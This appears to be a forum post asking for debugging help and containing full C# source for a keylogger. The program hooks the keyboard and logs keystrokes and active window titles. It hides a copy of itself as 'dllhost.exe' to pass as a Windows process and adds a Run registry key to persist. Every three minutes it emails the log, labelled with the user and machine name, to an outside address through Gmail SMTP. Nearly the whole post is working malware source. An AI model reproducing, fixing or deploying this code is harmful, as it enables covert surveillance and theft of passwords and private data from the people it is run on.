Hi,
I'm testing a keylogger and now have trouble when go write active window title and the key pressed directly to txt file. When I start the program and press some key, only first key pressed is logged. I can't see the error.
here is full source code:
Before add dependence System.Windows.Forms.
using Microsoft.Win32;
using System;
using System.Collections.Generic;
using System.Diagnostics;
using System.IO;
using System.Linq;
using System.Net;
using System.Net.Mail;
using System.Reflection;
using System.Runtime.InteropServices;
using System.Security.Permissions;
using System.Text;
using System.Threading.Tasks;
using System.Windows.Forms;
using System.Timers;
using System.Threading;
namespace dllhost
{
class Program
{
private static string startupPath;
private static HandleRef NullHandleRef = new HandleRef();
private static string path = Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData)+"\\data.txt";
private static string dest = Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) +"\\dllhost.exe";
private static string active = null;
private const int WH_KEYBOARD_LL = 13;
private const int WM_KEYDOWN = 0x0100;
private static KeyboardProc _proc = HookCallback;
private static IntPtr _hookID = IntPtr.Zero;
private delegate IntPtr KeyboardProc(int nCode, IntPtr wParam, IntPtr lParam);
[DllImport("user32.dll")]
static extern IntPtr GetForegroundWindow();
[DllImport("user32.dll")]
static extern int GetWindowText(IntPtr hWnd, StringBuilder text, int count);
[DllImport("user32.dll", CharSet = CharSet.Auto, SetLastError = true)]
private static extern IntPtr SetWindowsHookEx(int idHook, KeyboardProc lpfn, IntPtr hMod, uint dwThreadId);
[DllImport("user32.dll", CharSet = CharSet.Auto, SetLastError = true)]
[return: MarshalAs(UnmanagedType.Bool)]
private static extern bool UnhookWindowsHookEx(IntPtr hhk);
[DllImport("user32.dll", CharSet = CharSet.Auto, SetLastError = true)]
private static extern IntPtr CallNextHookEx(IntPtr hhk, int nCode, IntPtr wParam, IntPtr lParam);
[DllImport("kernel32.dll", CharSet = CharSet.Auto, SetLastError = true)]
private static extern IntPtr GetModuleHandle(string lpModuleName);
[DllImport("kernel32.dll", CharSet = CharSet.Auto)]
private static extern int GetModuleFileName(HandleRef hModule, StringBuilder buffer, int length);
static void Main()
{
Hook();
if (File.Exists(dest)==false)
{
File.Copy(StartupPath(), dest, true);
File.SetAttributes(dest, FileAttributes.Hidden);
AddToReg();
}
System.Timers.Timer myTimer = new System.Timers.Timer();
myTimer.Elapsed += new ElapsedEventHandler(Program.sendEMailThroughGmail);
myTimer.Interval = 180000;
myTimer.Enabled = true;
myTimer.AutoReset = true;
myTimer.Start();
Application.Run();
GC.KeepAlive(myTimer);
UnHook();
}
private static string getTitle()
{
IntPtr handle = GetForegroundWindow();
StringBuilder sb = new StringBuilder(1000);
GetWindowText(handle, sb, 1000);
string winText = sb.ToString();
return winText;
}
public static void sendEMailThroughGmail(Object source, ElapsedEventArgs e)
{
try
{
MailMessage mM = new MailMessage();
mM.From = new MailAddress("sender@gmail.com");
mM.To.Add("recipient@live.com");
mM.Subject = Environment.UserName + " / " + Environment.MachineName;
mM.Attachments.Add(new Attachment(path));
mM.Body = "Nothing";
mM.IsBodyHtml = true;
SmtpClient sC = new SmtpClient("smtp.gmail.com");
sC.Port = 587;
sC.Credentials = new NetworkCredential("sender@gmail.com", "senderpass");
sC.EnableSsl = true;
sC.Send(mM);
}
catch (Exception)
{
}
File.Delete(path);
}
private static void AddToReg()
{
RegistryKey rk = Registry.CurrentUser.OpenSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", true);
rk.SetValue("dllhost", dest);
}
public static string StartupPath()
{
if (startupPath == null)
{
StringBuilder buffer = new StringBuilder(260);
GetModuleFileName(NullHandleRef, buffer, buffer.Capacity);
startupPath = Path.GetDirectoryName(buffer.ToString());
}
new FileIOPermission(FileIOPermissionAccess.PathDiscovery, startupPath).Demand();
return startupPath + "\\" + Assembly.GetExecutingAssembly().ManifestModule.Name; ;
}
public static void Hook()
{
using (Process curProcess = Process.GetCurrentProcess())
using (ProcessModule curModule = curProcess.MainModule)
{
_hookID = SetWindowsHookEx(WH_KEYBOARD_LL, _proc, GetModuleHandle(curModule.ModuleName), 0);
}
}
private static IntPtr HookCallback(int nCode, IntPtr wParam, IntPtr lParam)
{
int KeyCode = Marshal.ReadInt32(lParam);
StreamWriter sw;
sw = new StreamWriter(path, true);
sw.AutoFlush = true;
if (nCode >= 0 && wParam == (IntPtr)WM_KEYDOWN)
{
if (!string.IsNullOrEmpty(active) || active != getTitle())
{
active = getTitle();
sw.WriteLine();
sw.WriteLine();
sw.WriteLine("Time: " + DateTime.Now.ToShortTimeString() + " Date: " + DateTime.Now.ToShortDateString() + " Window: " + active + " - ");
}
sw.WriteLine((Keys)KeyCode);
}
return CallNextHookEx(_hookID, nCode, wParam, lParam);
}
public static void UnHook()
{
UnhookWindowsHookEx(_hookID);
}
}
}Thank in advance.